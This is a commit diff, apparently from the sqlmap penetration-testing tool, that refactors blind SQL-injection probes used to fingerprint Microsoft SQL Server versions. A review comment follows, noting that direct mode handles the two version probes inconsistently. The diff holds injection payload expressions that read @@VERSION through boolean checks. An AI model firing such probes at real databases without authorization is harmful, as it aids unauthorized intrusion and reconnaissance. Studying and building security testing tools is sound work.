OR based inference works for the first time in history and fingerprint of 4 major DBMSes is now injection based (instead of AND)

This commit is contained in:
Miroslav Stampar
2010-12-06 18:20:57 +00:00
parent e4b51dd549
commit d77ddbee47
8 changed files with 36 additions and 40 deletions


@@ -92,8 +92,7 @@ class Fingerprint(GenericFingerprint):
result = True
else:
randInt = randomInt()
payload = agent.fullPayload("AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
result = Request.queryPage(payload)
result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
if result:
infoMsg = "confirming Microsoft SQL Server"
@@ -101,13 +100,12 @@ class Fingerprint(GenericFingerprint):
for version in (0, 5, 8):
randInt = randomInt()
query = "AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
check = "%d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
if conf.direct:
query = query.replace("AND ", "SELECT 1 WHERE ", 1)
check = "SELECT 1 WHERE " + check
payload = agent.fullPayload(query)
result = Request.queryPage(payload)
result = inject.checkBooleanExpression(check)
if result:
if version == 8:
@@ -126,9 +124,8 @@ class Fingerprint(GenericFingerprint):
break
else:
query = "AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
payload = agent.fullPayload(query)
result = Request.queryPage(payload)
check = "%d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
result = inject.checkBooleanExpression(check)
if result:
kb.dbmsVersion = ["7.0"]
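Review bot: The conf.direct handling is now inconsistent between the two version probes: the 2000/2005/2008 loop still prepends `SELECT 1 WHERE ` to `check` under `if conf.direct:`, but the 7.0 fallback `check` (the `SUBSTRING((@@VERSION), 22, 1)=7` expression) is handed to `inject.checkBooleanExpression` with no such prefix, so in direct mode the two probes reach the helper in different shapes and at most one of them can be right. If `checkBooleanExpression` already turns a bare boolean expression into a complete statement (its body is not visible here), the manual prefix in the loop is the one to drop; otherwise the fallback needs the same two lines, `if conf.direct:` / `    check = "SELECT 1 WHERE " + check`, before its `result = inject.checkBooleanExpression(check)`. Whichever way it is resolved, a short comment on the direct branch stating which layer is responsible for making the expression a standalone statement would stop the two probes drifting apart again. The enclosing method starts before the first hunk and continues past the last one.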